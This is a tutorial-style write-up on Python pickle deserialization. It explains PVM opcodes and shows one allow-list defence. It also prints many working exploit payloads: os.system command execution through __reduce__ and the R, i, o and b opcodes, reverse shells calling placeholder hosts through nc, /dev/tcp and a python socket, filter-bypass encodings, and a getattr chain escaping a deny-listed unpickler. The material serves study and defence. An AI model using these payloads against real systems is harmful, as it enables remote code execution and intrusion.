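Python serialization and deserialization
As in PHP and Java, serialization and deserialization in Python convert between objects and data. They exist to solve the problems of transmitting objects and storing them persistently.
In Python, serialization is usually done with the pickle module or the json module.
Both modules provide four functions: dumps(), dump(), loads(), and load().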
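Function    Description
dump()      Serialize an object and write the result to a file object
dumps()     Serialize an object and return the result (a bytes object for pickle)
load()      Read data from a file object and deserialize it
loads()     Deserialize from a bytes object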
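Compared with json, pickle stores data in a binary form that is hard to read by hand. json is language-independent, while pickle is specific to Python. pickle can represent almost every Python type (including user-defined types), whereas json out of the box covers only a subset of the built-in types and cannot represent user-defined types.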
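The difference in type coverage can be seen with a small sketch. The sample value below (a date and a set) is an assumption chosen for illustration; user-defined classes behave in a similar way.

```python
import datetime
import json
import pickle

# Sample value containing types that json does not handle by default.
value = {"when": datetime.date(2024, 1, 2), "tags": {"a", "b"}}

# pickle round-trips the value unchanged and produces bytes.
blob = pickle.dumps(value)
restored = pickle.loads(blob)

# json refuses the same value with a TypeError.
try:
    json.dumps(value)
    json_ok = True
except TypeError as exc:
    json_ok = False
    print("json refused:", exc)

# json works once the value is reduced to plain built-in types, and returns str.
text = json.dumps({"when": "2024-01-02", "tags": ["a", "b"]})
print(type(blob).__name__, type(text).__name__)
```

Only ever call pickle.loads() on data you produced yourself; the rest of this article shows why.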
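PVM
Unpickling is carried out by the PVM (Pickle Virtual Machine), which is part of the Python standard library and is provided by the pickle module. Pickling produces the opcode stream that the PVM later executes.

The PVM consists of three parts: an instruction processor, a stack, and a memo area.
Instruction processor: the engine. It reads an opcode and its arguments from the stream and interprets them, repeating until it reaches the terminator `.`. The value left on top of the stack is returned as the deserialized object.

Stack: implemented as a Python list. It temporarily holds data, arguments, and objects. Deserialization is performed by pushing to and popping from it, and the final result ends up on top of the stack.

Memo: also called the label area, implemented as a Python dict. It provides storage for the whole lifetime of the PVM (deserialized data is stored in the memo as key-value pairs so that it can be reused later).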
 
 
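PVM protocols
Different Python versions use different default protocols, and the instruction sets of the protocols differ considerably, so data serialized by different Python versions is not identical.
The opcode version can be selected with protocol=num. The pickle protocols are backward compatible: a newer Python can load data written with an older protocol.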
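As a minimal sketch of protocol selection, the snippet below serializes one value with every protocol the running interpreter supports and loads each result back. The sample dictionary is only an illustration.

```python
import pickle

data = {"name": "lewiserii", "ids": [1, 2, 3]}

print("default protocol:", pickle.DEFAULT_PROTOCOL)
print("highest protocol:", pickle.HIGHEST_PROTOCOL)

# Serialize the same value once per supported protocol.
blobs = {p: pickle.dumps(data, protocol=p)
         for p in range(pickle.HIGHEST_PROTOCOL + 1)}

# loads() detects the protocol from the stream, so no protocol argument is needed.
results = {p: pickle.loads(blob) for p, blob in blobs.items()}

for p, blob in blobs.items():
    print(p, len(blob), results[p] == data)
```

From protocol 2 onward the stream starts with the PROTO opcode (\x80) followed by the protocol number, which is how the version can be recognized at a glance.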
    import pickle

    class Test:
        def __init__(self, name='lewiserii'):
            self.name = name

    test = Test()
    # Serialize the same object with protocols 0 to 5
    for i in range(6):
        print('[+] pickle v{}: {}'.format(str(i), pickle.dumps(test, protocol=i)))
 
    [+] pickle v0: b'ccopy_reg\n_reconstructor\np0\n(c__main__\nTest\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n(dp5\nVname\np6\nVlewiserii\np7\nsb.'
    [+] pickle v1: b'ccopy_reg\n_reconstructor\nq\x00(c__main__\nTest\nq\x01c__builtin__\nobject\nq\x02Ntq\x03Rq\x04}q\x05X\x04\x00\x00\x00nameq\x06X\t\x00\x00\x00lewiseriiq\x07sb.'
    [+] pickle v2: b'\x80\x02c__main__\nTest\nq\x00)\x81q\x01}q\x02X\x04\x00\x00\x00nameq\x03X\t\x00\x00\x00lewiseriiq\x04sb.'
    [+] pickle v3: b'\x80\x03c__main__\nTest\nq\x00)\x81q\x01}q\x02X\x04\x00\x00\x00nameq\x03X\t\x00\x00\x00lewiseriiq\x04sb.'
    [+] pickle v4: b'\x80\x04\x95/\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04Test\x94\x93\x94)\x81\x94}\x94\x8c\x04name\x94\x8c\tlewiserii\x94sb.'
    [+] pickle v5: b'\x80\x05\x95/\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04Test\x94\x93\x94)\x81\x94}\x94\x8c\x04name\x94\x8c\tlewiserii\x94sb.'
 
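Differences between the versions
v0 is the original "human-readable" protocol and is backward compatible with earlier versions of Python.
v1 is an old binary format that is also compatible with earlier versions of Python.
v2 was added in Python 2.3. It provides a much more efficient mechanism for storing new-style classes (see PEP 307).
v3 was added in Python 3.0. It has explicit support for bytes objects and cannot be unpickled by Python 2.x. It was the default protocol in Python 3.0 to 3.7.
v4 was added in Python 3.4. It supports very large objects, can pickle more kinds of objects, and includes some data format optimizations (see PEP 3154). It is the default protocol starting with Python 3.8.
v5 was added in Python 3.8. It adds support for out-of-band data and speeds up in-band data handling (see PEP 574).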
 
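opcode
An opcode (operation code) is the core of the serialized content, and every opcode is a single byte.
The complete list of opcodes can be found in $PYTHON/Lib/pickle.py.
Some common ones, mostly from protocol v0, are listed below:
    MARK           = b'('   # push special markobject on stack
    STOP           = b'.'   # every pickle ends with STOP
    POP            = b'0'   # discard topmost stack item
    POP_MARK       = b'1'   # discard stack top through topmost markobject
    DUP            = b'2'   # duplicate top stack item
    FLOAT          = b'F'   # push float object; decimal string argument
    INT            = b'I'   # push integer or bool; decimal string argument
    NONE           = b'N'   # push None
    REDUCE         = b'R'   # apply callable to argtuple, both on stack
    STRING         = b'S'   # push string; NL-terminated string argument
    UNICODE        = b'V'   # push Unicode string; raw-unicode-escaped argument
    APPEND         = b'a'   # append stack top to list below it
    BUILD          = b'b'   # call __setstate__ or __dict__.update()
    GLOBAL         = b'c'   # push self.find_class(modname, name); 2 string args
    DICT           = b'd'   # build a dict from stack items
    EMPTY_DICT     = b'}'   # push empty dict
    APPENDS        = b'e'   # extend list on stack by topmost stack slice
    GET            = b'g'   # push item from memo on stack; index is string arg
    INST           = b'i'   # build & push class instance
    LIST           = b'l'   # build list from topmost stack items
    EMPTY_LIST     = b']'   # push empty list
    OBJ            = b'o'   # build & push class instance
    PUT            = b'p'   # store stack top in memo; index is string arg
    SETITEM        = b's'   # add key+value pair to dict
    TUPLE          = b't'   # build tuple from topmost stack items
    EMPTY_TUPLE    = b')'   # push empty tuple
    SETITEMS       = b'u'   # modify dict by adding topmost key+value pairs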
 
How a serialized byte stream is processed
A short piece of bytecode is used here to demonstrate the process:
    cos
    system
    (S'whoami'
    tR.
 
The following walks through the processing of this byte stream, following the source code in pickle.py.
c
Fetches a global object or imports a module (it calls import and can therefore bring in new packages), then pushes the result onto the stack.
Source code:
    def load_global(self):
        # Read the module name (first line) and the attribute name (second line)
        module = self.readline()[:-1].decode("utf-8")
        name = self.readline()[:-1].decode("utf-8")
        # Import the module and fetch the attribute
        klass = self.find_class(module, name)
        # Push it onto the stack
        self.append(klass)
    dispatch[GLOBAL[0]] = load_global

    def find_class(self, module, name):
        # Subclasses may override this.
        sys.audit('pickle.find_class', module, name)
        if self.proto < 3 and self.fix_imports:
            if (module, name) in _compat_pickle.NAME_MAPPING:
                module, name = _compat_pickle.NAME_MAPPING[(module, name)]
            elif module in _compat_pickle.IMPORT_MAPPING:
                module = _compat_pickle.IMPORT_MAPPING[module]
        __import__(module, level=0)
        if self.proto >= 4:
            return _getattribute(sys.modules[module], name)[0]
        else:
            return getattr(sys.modules[module], name)

    def _getattribute(obj, name):
        # Resolve a dotted name one attribute at a time
        for subpath in name.split('.'):
            if subpath == '<locals>':
                raise AttributeError("Can't get local attribute {!r} on {!r}"
                                     .format(name, obj))
            try:
                parent = obj
                obj = getattr(obj, subpath)
            except AttributeError:
                raise AttributeError("Can't get attribute {!r} on {!r}"
                                     .format(name, obj)) from None
        return obj, parent
 
(
Pushes a MARK onto the stack.
Source code:
    def load_mark(self):
        # Save the current stack on the metastack
        self.metastack.append(self.stack)
        # Start a fresh, empty stack
        self.stack = []
        self.append = self.stack.append
    dispatch[MARK[0]] = load_mark
 
S
Instantiates a string object.
Source code:
    def load_string(self):
        # Read up to the newline and drop it
        data = self.readline()[:-1]
        # Strip outermost quotes
        if len(data) >= 2 and data[0] == data[-1] and data[0] in b'"\'':
            data = data[1:-1]
        else:
            raise UnpicklingError("the STRING opcode argument must be quoted")
        # Decode escape sequences, then push the string onto the stack
        self.append(self._decode_string(codecs.escape_decode(data)[0]))
    dispatch[STRING[0]] = load_string

    def _decode_string(self, value):
        # Used to allow strings from Python 2 to be decoded either as
        # bytes or Unicode strings.
        if self.encoding == "bytes":
            return value
        else:
            return value.decode(self.encoding, self.errors)
 
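t
Finds the most recent MARK on the stack, combines the items after it into a tuple, pops those items and the MARK, and pushes the tuple back.
Source code:
    def load_tuple(self):
        # Collect everything pushed since the last MARK
        items = self.pop_mark()
        # Push the items back as a tuple
        self.append(tuple(items))
    dispatch[TUPLE[0]] = load_tuple

    def pop_mark(self):
        # The current stack holds exactly the items after the MARK
        items = self.stack
        # Restore the stack that was saved when the MARK was pushed
        self.stack = self.metastack.pop()
        self.append = self.stack.append
        return items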
 
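R
Pops two objects off the stack. The first is used as the arguments (it must be a tuple) and the second as the function. The function is then called and its result is pushed back onto the stack.
Source code:
    def load_reduce(self):
        stack = self.stack
        # Pop the argument tuple
        args = stack.pop()
        # The callable is now on top of the stack
        func = stack[-1]
        # Replace the callable with the result of the call
        stack[-1] = func(*args)
    dispatch[REDUCE[0]] = load_reduce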
 
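.
Ends the program. The item on top of the stack becomes the return value of pickle.loads().
Source code:
    def load_stop(self):
        # Pop the final result and stop the interpreter loop
        value = self.stack.pop()
        raise _Stop(value)
    dispatch[STOP[0]] = load_stop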
 
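This gives the following interpretation.
c is followed by the module name, and the name after the newline is the attribute name, so os.system is pushed onto the stack. A mark is pushed next, followed by the string whoami. On t, the items are popped back to the mark and converted into a tuple, which is pushed while the mark disappears. On R, the tuple is taken off the stack and passed as arguments to the function, and the result of the call is pushed back.
The whole stream can be read as executing os.system('whoami').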
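The walk-through above can be condensed into a toy interpreter. This is only a sketch covering the six opcodes used in the example, not the real pickle implementation. The function name toy_pvm and the allowed lookup table are hypothetical; the table replaces the real import step so that the demo stays harmless, and len stands in for os.system.

```python
def toy_pvm(data: bytes, allowed: dict):
    """Interpret a tiny subset of protocol-0 opcodes: c ( S t R ."""
    stack, metastack = [], []
    pos = 0

    def readline():
        # Read up to the next newline and return the text without it.
        nonlocal pos
        end = data.index(b"\n", pos)
        line = data[pos:end]
        pos = end + 1
        return line.decode("utf-8")

    while True:
        op = data[pos:pos + 1]
        pos += 1
        if op == b"c":                 # GLOBAL: look up (module, name)
            module, name = readline(), readline()
            stack.append(allowed[(module, name)])
        elif op == b"(":               # MARK: save the stack, start a new one
            metastack.append(stack)
            stack = []
        elif op == b"S":               # STRING: strip the surrounding quotes
            stack.append(readline()[1:-1])
        elif op == b"t":               # TUPLE: items since MARK become a tuple
            items = stack
            stack = metastack.pop()
            stack.append(tuple(items))
        elif op == b"R":               # REDUCE: call func(*args)
            args = stack.pop()
            func = stack.pop()
            stack.append(func(*args))
        elif op == b".":               # STOP: the top of the stack is the result
            return stack.pop()
        else:
            raise ValueError(f"unsupported opcode {op!r}")


# Same shape as the payload above, with a harmless callable.
allowed = {("builtins", "len"): len}
result = toy_pvm(b"cbuiltins\nlen\n(S'whoami'\ntR.", allowed)
print(result)
```

The real Unpickler differs in one important way: its c handler imports whatever module the stream names, which is what turns this small stack machine into a code execution primitive.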
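When the bytecode is long, reading it against the opcode table one byte at a time becomes tedious, so Python provides the pickletools module to help people read opcodes.
The most commonly used functions are pickletools.dis and pickletools.optimize.
pickletools.dis: a disassembler that prints a serialized object in a readable form.
pickletools.optimize: optimizes a serialized result by removing unused PUT opcodes.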
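A short sketch of both helpers follows. pickletools.dis only disassembles the stream and does not execute it, so it is safe to run on the payload from the previous section. The list [1, 2, 3] is just sample data.

```python
import io
import pickle
import pickletools

payload = b"cos\nsystem\n(S'whoami'\ntR."

# Disassemble into a string buffer instead of stdout; nothing is executed.
out = io.StringIO()
pickletools.dis(payload, out=out)
listing = out.getvalue()
print(listing)

# optimize() drops PUT opcodes whose memo slots are never read back.
blob = pickle.dumps([1, 2, 3], protocol=0)
optimized = pickletools.optimize(blob)
print(blob)
print(optimized)
```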
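Common exploitation approaches
The vulnerability arises when an attacker controls the data that reaches a deserialization entry point.
The magic method __reduce__()
The PVM opcode R is the low-level counterpart of the value returned by __reduce__(). When an object is pickled, its __reduce__() method is called and returns a (callable, args) pair, which is written to the stream as an R opcode. When the stream is loaded, the unpickler calls callable(*args). The effect is comparable to __wakeup() in PHP: code runs automatically during deserialization, so this feature can be used to trigger malicious code.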
 
Below is an example that uses __reduce__(). It works whenever the data passed to pickle.loads can be controlled.
Note that a single __reduce__ can only execute one function.
    import pickle
    import pickletools
    import os

    class Test(object):
        def __reduce__(self):
            shell = """whoami"""
            # (callable, args): the unpickler will call os.system(shell)
            return os.system, (shell,)

    test = Test()
    a = pickle.dumps(test, protocol=0)
    pickle.loads(a)
    print(a)
    pickletools.dis(pickletools.optimize(a))
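To see the mechanism without running a shell command, here is a harmless variant of the same idea. The class name Demo and the choice of sorted as the callable are assumptions made for illustration.

```python
import pickle

class Demo:
    def __reduce__(self):
        # (callable, args): the unpickler will call sorted([3, 1, 2])
        return sorted, ([3, 1, 2],)

blob = pickle.dumps(Demo(), protocol=0)
result = pickle.loads(blob)

print(blob)    # the stream contains a GLOBAL for sorted and a REDUCE (R)
print(result)  # the return value of the call, not a Demo instance
```

Note that pickle.loads() returns whatever the callable returned. The Demo class itself is never referenced in the stream, which is why the victim does not need to have the attacker's class defined.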
 
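Overwriting global variables
Authentication can be bypassed by overwriting credentials.

    import pickle
    import pickletools
    import secret

    print("Value of the variable: " + secret.key)

    # GLOBAL __main__.secret, build {'key': '123'}, then BUILD updates secret.__dict__
    opcode = b'''c__main__
    secret
    (S'key'
    S'123'
    db.'''

    pickle.loads(opcode)
    print("Value of the variable: " + secret.key)
    pickletools.dis(opcode)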
 
Referencing global variables
    import pickle
    import pickletools
    import secret

    class Target:
        def __init__(self):
            obj = pickle.loads(b'ccopy_reg\n_reconstructor\n(c__main__\nTarget\nc__builtin__\nobject\nNtR(dVpwd\nVa\nsb.')
            if obj.pwd == secret.pwd:
                print("Hello, admin!")
            else:
                print("No")

    test = Target()
 
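In the example above the value of secret.pwd is unknown. To make the if condition true, the c opcode can be used.
c fetches a global object or imports a module (it calls import and can therefore bring in new packages), then pushes the result onto the stack.
    # A guessed value for pwd, which only works if the guess is right
    b'ccopy_reg\n_reconstructor\n(c__main__\nTarget\nc__builtin__\nobject\nNtR(dVpwd\nVaaa\nsb.'
    # Reference secret.pwd itself, so the comparison always succeeds
    b'ccopy_reg\n_reconstructor\n(c__main__\nTarget\nc__builtin__\nobject\nNtR(dVpwd\ncsecret\npwd\nsb.'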
 
This is similar to the reference bypass $this->b = &$this->a; in PHP deserialization, except that Python achieves it through import.
 
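Command execution
pickle has four bytecode constructs that can be used to call functions: R, i, o, and b combined with __setstate__().
R
The earlier example uses R to achieve RCE.
R: pops two objects off the stack. The first is used as the arguments (it must be a tuple) and the second as the function. The function is then called and its result is pushed back onto the stack.

    opcode=b'''cos
    system
    (S'whoami'
    tR.'''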
 
i
Equivalent to a combination of c and o. It first fetches a global function, then searches from the top of the stack for the most recent MARK, combines the items in between into a tuple, and calls the global function with that tuple as arguments (or instantiates an object).

    def load_inst(self):
        # Read the module name and the attribute name
        module = self.readline()[:-1].decode("ascii")
        name = self.readline()[:-1].decode("ascii")
        klass = self.find_class(module, name)
        # Call it with everything pushed since the last MARK
        self._instantiate(klass, self.pop_mark())
    dispatch[INST[0]] = load_inst

    def _instantiate(self, klass, args):
        if (args or not isinstance(klass, type) or
            hasattr(klass, "__getinitargs__")):
            try:
                value = klass(*args)
            except TypeError as err:
                raise TypeError("in constructor for %s: %s" %
                                (klass.__name__, str(err)), sys.exc_info()[2])
        else:
            value = klass.__new__(klass)
        self.append(value)

    opcode=b'''(S'whoami'
    ios
    system
    .'''
 
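o
Searches from the top of the stack for the most recent MARK. The first item after the MARK (which must be a function) is used as the callable and the second through n-th items as arguments. The function is called (or an object is instantiated), the MARK is popped, and the result is pushed back.

    def load_obj(self):
        # Everything pushed since the last MARK
        args = self.pop_mark()
        # The first item is the callable
        cls = args.pop(0)
        # Call it with the remaining items
        self._instantiate(cls, args)
    dispatch[OBJ[0]] = load_obj

    opcode=b'''(cos
    system
    S'whoami'
    o.'''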
 
b + __setstate__()
Uses the top item of the stack (a dict holding attribute name/value pairs) to set attributes on the item below it (an object instance), by calling __setstate__ or __dict__.update().

    def load_build(self):
        stack = self.stack
        # Pop the state (usually a dict)
        state = stack.pop()
        # The instance stays on the stack
        inst = stack[-1]
        # Look for a __setstate__ attribute on the instance
        setstate = getattr(inst, "__setstate__", None)
        # If present, call it with the state and stop here
        if setstate is not None:
            setstate(state)
            return
        slotstate = None
        if isinstance(state, tuple) and len(state) == 2:
            state, slotstate = state
        if state:
            inst_dict = inst.__dict__
            intern = sys.intern
            # Otherwise copy the state into the instance __dict__
            for k, v in state.items():
                if type(k) is str:
                    inst_dict[intern(k)] = v
                else:
                    inst_dict[k] = v
        if slotstate:
            for k, v in slotstate.items():
                setattr(inst, k, v)
    dispatch[BUILD[0]] = load_build
 
Because __setstate__ normally does not exist, setstate(state) is not triggered. However, if a dict {"__setstate__": os.system} is pushed by hand and b is executed, a new key-value pair is added to the instance. If a command is then pushed and b is executed again, setstate is no longer None but the os.system that was passed in. The call becomes os.system(state), where state is the command, which completes the RCE.
    import pickle
    import pickletools

    class Test(object):
        def __init__(self, name):
            self.name = "aa"

    opcode = b'''(c__main__
    Test
    )o(S"__setstate__"
    cos
    system
    dbS"whoami"
    b.'''

    pickle.loads(opcode)
    pickletools.dis(opcode)

    '''
    lewiserii\lewiserii
        0: (    MARK
        1: c        GLOBAL     '__main__ Test'
       16: )        EMPTY_TUPLE
       17: o        OBJ        (MARK at 0)
       18: (    MARK
       19: S        STRING     '__setstate__'
       35: c        GLOBAL     'os system'
       46: d        DICT       (MARK at 18)
       47: b    BUILD
       48: S    STRING     'whoami'
       58: b    BUILD
       59: .    STOP
    highest protocol among opcodes = 1
    '''
 
Reverse shell
Once commands can be executed, a reverse shell is possible as well. A few payloads follow.
Using i to run a command that opens a shell

    import base64
    import pickle

    payload = b'''(S'python -c 'import os,pty,socket;s=socket.socket();s.connect(("ip", port));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")''
    ios
    system
    .'''

    payload2 = b'''(S'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'
    ios
    popen
    .'''

    # payload is already a raw opcode stream, so encode it directly
    print(base64.b64encode(payload))

Using __reduce__ to run an nc command directly

    import base64
    import pickle

    class Test(object):
        def __reduce__(self):
            return (eval, ("__import__('os').system('nc ip port -e/bin/sh')",))

    payload = Test()
    print(base64.b64encode(pickle.dumps(payload)))
 
pker
pker is a tool written by eddieivan01 that traverses the Python AST to automate the construction of pickle opcode.
 
Fixing the vulnerability
A common fix for pickle deserialization vulnerabilities is to override Unpickler.find_class() to restrict which globals can be loaded.
For example:
    import builtins
    import io
    import pickle

    # Only these names from builtins may be loaded
    safe_builtins = {
        'range',
        'complex',
        'set',
        'frozenset',
        'slice',
    }

    class RestrictedUnpickler(pickle.Unpickler):

        def find_class(self, module, name):
            # Only allow safe classes from builtins.
            if module == "builtins" and name in safe_builtins:
                return getattr(builtins, name)
            # Forbid everything else.
            raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                         (module, name))

    def restricted_loads(s):
        """Helper function analogous to pickle.loads()."""
        return RestrictedUnpickler(io.BytesIO(s)).load()

    opcode = b"cos\nsystem\n(S'echo hello world'\ntR."
    restricted_loads(opcode)

    Traceback (most recent call last):
    ...
    _pickle.UnpicklingError: global 'os.system' is forbidden
 
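The example above overrides Unpickler.find_class() so that only the builtins module may be used and the name must be on the allow list. Anything else raises an exception.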
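bypass
Keyword bypass
When opcode is used to overwrite a variable, the code may filter the keyword of the attribute we want to overwrite.

For example:
    import pickle
    import pickletools
    import secret

    print("Value of the variable: " + secret.key)

    # opcode is the attacker-supplied byte string
    if b'key' in opcode:
        print('NoNoNo')
    else:
        pickle.loads(opcode)

    print("Value of the variable: " + str(secret.key))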
 
The normal opcode would be:
    opcode = b'''c__main__
    secret
    (S'key'
    S'123'
    db.'''
 
Method 1: hexadecimal
The S opcode understands hexadecimal escapes, so the characters can be hex-encoded to get past the filter.
    import pickle
    import pickletools
    import secret

    print("Value of the variable: " + secret.key)

    # 'key' written as \x6B\x65\x79; the backslashes are literal bytes in the stream
    opcode = b'''c__main__
    secret
    (S'\\x6B\\x65\\x79'
    S'111'
    db.'''

    if b'key' in opcode:
        print('NoNoNo')
    else:
        pickle.loads(opcode)

    print("Value of the variable: " + str(secret.key))

    '''
    Value of the variable: 123
    Value of the variable: 111
    '''
 
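Method 2: Unicode escapes
Likewise, the V opcode understands Unicode escapes.
    import pickle
    import pickletools
    import secret

    print("Value of the variable: " + secret.key)

    # 'key' written as \u006b\u0065\u0079; the backslashes are escaped so that
    # the bytes literal contains them literally without an invalid-escape warning
    opcode = b'''c__main__
    secret
    (V\\u006b\\u0065\\u0079
    S'111111'
    db.'''

    if b'key' in opcode:
        print('NoNoNo')
    else:
        pickle.loads(opcode)

    print("Value of the variable: " + str(secret.key))

    '''
    Value of the variable: 123
    Value of the variable: 111111
    '''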
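Both escape forms can be checked in isolation, without a secret module. This is a minimal sketch in which each stream just pushes one string and stops.

```python
import pickle

# S with hexadecimal escapes and V with Unicode escapes.
# The backslashes are literal bytes inside the pickle stream.
hex_form = b"S'\\x6b\\x65\\x79'\n."
uni_form = b"V\\u006b\\u0065\\u0079\n."

# A naive byte filter for b'key' matches neither stream.
filtered = (b"key" in hex_form) or (b"key" in uni_form)

decoded_hex = pickle.loads(hex_form)
decoded_uni = pickle.loads(uni_form)
print(filtered, decoded_hex, decoded_uni)
```

This is why filtering on raw substrings of the input is unreliable: the unpickler decodes the escapes only after the filter has already looked at the bytes.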
 
Method 3: obtaining the keyword through built-in functions
In Python, after a module has been imported, all of its attributes can be listed with dir(sys.modules['xxx']).
For example:
    import secret
    import sys

    print(dir(sys.modules['secret']))

    '''
    ['__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'key']
    '''

However, pickle does not support list indexing or dict indexing, so reversed() and next() are needed to pick out the element.
    import secret
    import sys

    print(next(reversed(dir(sys.modules['secret']))))

    '''
    key
    '''
 
Converted to opcode, step by step:
    # dir(secret)
    opcode=b'''(c__main__
    secret
    i__builtin__
    dir
    .'''

    # reversed(dir(secret))
    opcode=b'''((c__main__
    secret
    i__builtin__
    dir
    i__builtin__
    reversed
    .'''

    # next(reversed(dir(secret)))
    opcode=b'''(((c__main__
    secret
    i__builtin__
    dir
    i__builtin__
    reversed
    i__builtin__
    next
    .'''

The complete script:
    import pickle
    import pickletools
    import secret

    print("Value of the variable: " + secret.key)

    opcode=b'''c__main__
    secret
    ((((c__main__
    secret
    i__builtin__
    dir
    i__builtin__
    reversed
    i__builtin__
    next
    S'111'
    db.'''

    if b'key' in opcode:
        print('NoNoNo')
    else:
        pickle.loads(opcode)

    print("Value of the variable: " + str(secret.key))

    '''
    Value of the variable: 123
    Value of the variable: 111
    '''
 
Bypassing the builtins restriction
If the find_class() override described earlier restricts modules with a deny list instead of an allow list, the restriction may be bypassable.
An example is picklecode from code-breaking 2018:
    import pickle
    import io
    import builtins

    class RestrictedUnpickler(pickle.Unpickler):
        blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

        def find_class(self, module, name):
            # Only allow safe classes from builtins.
            if module == "builtins" and name not in self.blacklist:
                return getattr(builtins, name)
            # Forbid everything else.
            raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                         (module, name))

    def restricted_loads(s):
        """Helper function analogous to pickle.loads()."""
        return RestrictedUnpickler(io.BytesIO(s)).load()
 
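Again only the builtins module is allowed, this time with a deny list on top. However, getattr is not on the deny list and can be used to fetch a denied function, for example builtins.getattr(builtins, 'eval').
As a payload: builtins.getattr(builtins, 'eval')('__import__("os").system("whoami")')
The opcode is then written by hand.
The first step is to call builtins.getattr.

Note that the builtins module cannot be pushed directly. A reference to the builtins module has to be constructed first and then passed to getattr.
For example, the builtins module can be taken from builtins.globals(), but because the return value is a <class 'dict'>, the get function of builtins.dict is also needed to look up '__builtins__'.
The transformed payload: builtins.getattr(builtins.getattr(builtins.dict,'get')(builtins.globals(),'__builtins__'),'eval')('__import__("os").system("whoami")')
The opcode is built up step by step: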
    import pickle
    import pickletools

    # Step 1: getattr(dict, 'get')
    opcode = b'''cbuiltins
    getattr
    (cbuiltins
    dict
    S'get'
    tR.
    '''

    pickletools.dis(opcode)
    print(pickle.loads(opcode))

    '''
        0: c    GLOBAL     'builtins getattr'
       18: (    MARK
       19: c        GLOBAL     'builtins dict'
       34: S        STRING     'get'
       41: t        TUPLE      (MARK at 18)
       42: R    REDUCE
       43: .    STOP
    highest protocol among opcodes = 0
    <method 'get' of 'dict' objects>
    '''

    import pickle
    import pickletools

    # Step 2: globals()
    opcode = b'''cbuiltins
    globals
    )R.
    '''

    pickletools.dis(opcode)
    print(pickle.loads(opcode))

    '''
        0: c    GLOBAL     'builtins globals'
       18: )    EMPTY_TUPLE
       19: R    REDUCE
       20: .    STOP
    highest protocol among opcodes = 1
    {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x000002490202C9D0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': 'C:\\Users\\lewiserii\\Desktop\\test\\2.py', '__cached__': None, 'pickle': <module 'pickle' from 'C:\\Python\\Python311\\Lib\\pickle.py'>, 'pickletools': <module 'pickletools' from 'C:\\Python\\Python311\\Lib\\pickletools.py'>, 'opcode': b'cbuiltins\nglobals\n)R.\n'}
    '''

    import pickle
    import pickletools

    # Step 3: dict.get(globals(), '__builtins__')
    opcode = b'''cbuiltins
    getattr
    (cbuiltins
    dict
    S'get'
    tR(cbuiltins
    globals
    )RS'__builtins__'
    tR.'''

    pickletools.dis(opcode)
    print(pickle.loads(opcode))

    '''
        0: c    GLOBAL     'builtins getattr'
       18: (    MARK
       19: c        GLOBAL     'builtins dict'
       34: S        STRING     'get'
       41: t        TUPLE      (MARK at 18)
       42: R    REDUCE
       43: (    MARK
       44: c        GLOBAL     'builtins globals'
       62: )        EMPTY_TUPLE
       63: R        REDUCE
       64: S        STRING     '__builtins__'
       80: t        TUPLE      (MARK at 43)
       81: R    REDUCE
       82: .    STOP
    highest protocol among opcodes = 1
    <module 'builtins' (built-in)>
    '''

    import pickle
    import pickletools

    # Step 4: getattr(<builtins module>, 'eval')
    opcode=b'''cbuiltins
    getattr
    (cbuiltins
    getattr
    (cbuiltins
    dict
    S'get'
    tR(cbuiltins
    globals
    )RS'__builtins__'
    tRS'eval'
    tR.'''

    pickletools.dis(opcode)
    print(pickle.loads(opcode))

    '''
        0: c    GLOBAL     'builtins getattr'
       18: (    MARK
       19: c        GLOBAL     'builtins getattr'
       37: (        MARK
       38: c            GLOBAL     'builtins dict'
       53: S            STRING     'get'
       60: t            TUPLE      (MARK at 37)
       61: R        REDUCE
       62: (        MARK
       63: c            GLOBAL     'builtins globals'
       81: )            EMPTY_TUPLE
       82: R            REDUCE
       83: S            STRING     '__builtins__'
       99: t            TUPLE      (MARK at 62)
      100: R        REDUCE
      101: S        STRING     'eval'
      109: t        TUPLE      (MARK at 18)
      110: R    REDUCE
      111: .    STOP
    highest protocol among opcodes = 1
    <built-in function eval>
    '''

    import pickle
    import pickletools

    # Step 5: call eval with the command string
    opcode=b'''cbuiltins
    getattr
    (cbuiltins
    getattr
    (cbuiltins
    dict
    S'get'
    tR(cbuiltins
    globals
    )RS'__builtins__'
    tRS'eval'
    tR(S'__import__("os").system("whoami")'
    tR.
    '''

    pickletools.dis(opcode)
    print(pickle.loads(opcode))

    '''
        0: c    GLOBAL     'builtins getattr'
       18: (    MARK
       19: c        GLOBAL     'builtins getattr'
       37: (        MARK
       38: c            GLOBAL     'builtins dict'
       53: S            STRING     'get'
       60: t            TUPLE      (MARK at 37)
       61: R        REDUCE
       62: (        MARK
       63: c            GLOBAL     'builtins globals'
       81: )            EMPTY_TUPLE
       82: R            REDUCE
       83: S            STRING     '__builtins__'
       99: t            TUPLE      (MARK at 62)
      100: R        REDUCE
      101: S        STRING     'eval'
      109: t        TUPLE      (MARK at 18)
      110: R    REDUCE
      111: (    MARK
      112: S        STRING     '__import__("os").system("whoami")'
      149: t        TUPLE      (MARK at 111)
      150: R    REDUCE
      151: .    STOP
    highest protocol among opcodes = 1
    lewiserii\lewiserii
    0
    '''

    import pickle
    import pickletools

    # The same chain written with the o opcode and the memo instead of R
    opcode = b'\x80\x03(cbuiltins\ngetattr\np0\ncbuiltins\ndict\np1\nX\x03\x00\x00\x00getop2\n0(g2\n(cbuiltins\nglobals\noX\x0C\x00\x00\x00__builtins__op3\n(g0\ng3\nX\x04\x00\x00\x00evalop4\n(g4\nX\x21\x00\x00\x00__import__("os").system("whoami")o00.'

    pickletools.dis(pickletools.optimize(opcode))
    pickle.loads(opcode)

    '''
        0: \x80 PROTO      3
        2: (    MARK
        3: c        GLOBAL     'builtins getattr'
       21: q        BINPUT     0
       23: c        GLOBAL     'builtins dict'
       38: X        BINUNICODE 'get'
       46: o        OBJ        (MARK at 2)
       47: q    BINPUT     1
       49: 0    POP
       50: (    MARK
       51: h        BINGET     1
       53: (        MARK
       54: c            GLOBAL     'builtins globals'
       72: o            OBJ        (MARK at 53)
